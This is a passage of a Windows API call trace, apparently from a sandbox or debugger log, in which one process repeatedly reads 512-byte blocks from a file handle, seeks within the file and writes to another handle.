lpOverlapped=0x0) returned 1 [0107.128] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.128] GetFileType (hFile=0x4c) returned 0x1 [0107.128] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.128] WriteFile (in: hFile=0x4c, lpBuffer=0x26f12c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f12c*, lpNumberOfBytesWritten=0x26e130*=0x20, lpOverlapped=0x0) returned 1 [0107.128] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.128] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.128] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.128] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.128] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.128] GetFileType (hFile=0x4c) returned 0x1 [0107.128] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.128] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.128] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.128] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.128] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.128] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.128] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: 
lpNewFilePointer=0x0) returned 1 [0107.128] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.128] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.128] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.128] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.129] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.129] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.129] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.129] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.129] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.129] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.129] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.129] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.129] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.129] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, 
lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.129] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.129] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.129] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.129] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.129] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.129] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.130] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.130] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.130] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.130] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.130] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.130] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.130] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.130] _get_osfhandle (_FileHandle=4) returned 0x54 
[0107.130] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.130] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.130] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.130] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.130] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.130] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.130] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.130] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.130] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.130] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.131] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.131] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.131] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.131] SetFilePointerEx (in: hFile=0x54, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.131] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.131] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.131] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.131] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.131] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.131] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.131] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.131] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.131] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.131] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.131] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.131] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.131] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.131] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, 
lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.131] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.131] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.131] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.132] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.132] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.132] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.132] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.132] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.132] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.132] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.132] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.132] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.132] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.132] 
_get_osfhandle (_FileHandle=4) returned 0x54 [0107.132] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.132] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.132] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.132] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.132] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.132] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.132] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.132] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.132] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.132] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.133] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.133] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.133] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 
[0107.133] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.133] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.133] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.133] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.133] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.133] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.133] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.133] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.133] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.133] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.133] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.133] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.133] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.133] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.133] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.133] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.133] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.133] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.134] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.134] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.134] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.134] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.134] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.134] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.134] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.134] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.134] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.134] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.134] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.134] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.134] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.134] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.134] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.134] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.134] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.134] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.135] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.135] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.135] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.135] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.135] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.135] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, 
lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.135] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.135] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.135] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.135] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.135] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.135] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.135] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.135] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.135] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.135] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.135] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.135] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.135] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.135] _get_osfhandle (_FileHandle=4) returned 0x54 
[0107.135] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.135] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.136] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.136] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.136] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.136] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.136] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.136] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.136] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.136] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.136] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.136] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.136] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.136] SetFilePointerEx (in: hFile=0x54, 
